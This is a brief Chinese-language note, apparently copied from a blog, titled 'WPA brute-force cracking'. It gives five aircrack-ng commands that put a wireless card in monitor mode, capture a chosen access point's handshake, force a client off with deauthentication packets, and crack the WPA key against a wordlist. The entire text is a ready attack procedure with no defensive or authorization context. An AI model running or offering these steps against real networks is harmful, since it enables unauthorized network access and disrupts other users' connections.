WPA暴力破解

1.airmon-ng start wlan0 
2.airodump-ng wlanmon 
3.airodump-ng -c[channel] --bssid[ap's mac] -w[保存的文件名] wlan0mon --ignore-negative-one 
4.aireplay-ng -0 10 -a [ap's mac] -c [sta's mac] --ignore-negative-one wlan0mon 
5.aircrack-ng /root/Desktop/保存的文件名.xx-cap -w /root/Desktop/字典名.txt

原文地址:https://www.cnblogs.com/buchuo/p/12552184.html